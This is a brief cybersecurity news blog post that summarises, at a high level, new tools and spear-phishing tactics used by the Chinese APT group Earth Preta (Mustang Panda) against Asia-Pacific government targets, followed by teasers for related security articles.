Suggestions

Earth Preta Hackers: Equipped With New Arsenal Tools

September 11, 2024
by
1 min read



TLDR:

Earth Preta (Mustang Panda) hackers, a sophisticated Chinese APT group, have added new tools to their cyberattack arsenal, including HIUPAN worm and PUBLOAD malware. They now target government entities in the Asia-Pacific region using spear-phishing tactics. This multi-stage attack includes tools like FDMTP, PTSOCKET, and uses exfiltration methods like cURL to FTP sites. The group’s evolving tactics and evasion techniques pose a significant threat.

Earth Preta Hackers Added New Tools To Their Arsenal

Earth Preta, also known as Mustang Panda, Bronze President, RedDelta, and Red Lich, is a Chinese APT group targeting government entities globally but focusing on the Asia-Pacific region. Recently, they have added new tools to their cyberattack strategy, including the HIUPAN worm to disseminate PUBLOAD malware through removable drives. The group uses tools like FDMTP for malware downloading and PTSOCKET for exfiltration. Their campaign begins with spear-phishing emails with .url attachments triggering a multi-stage malware deployment process. The attacks target specific files with extensions like .doc, .xls, and .pdf. The evolving tactics and sophisticated evasion techniques of Earth Preta pose a significant threat to various sectors.


Post Views: 24

Adrian Johnson

Latest from Blog

Bogus job tempts aerospace, energy workers

TLDR: A North Korean cyberespionage group is posing as job recruiters to target employees in aerospace and energy sectors. Mandiant reports that the group uses fake job descriptions stored in malicious archives

Cyber insurance changes shape of security for good and bad

TLDR: Key Points: Cyber-insurance landscape is shifting to encourage greater cyber resiliency Rising costs of cyberattacks are prompting insurers to re-examine underwriting How Cyber-Insurance Shifts Affect the Security Landscape The article discusses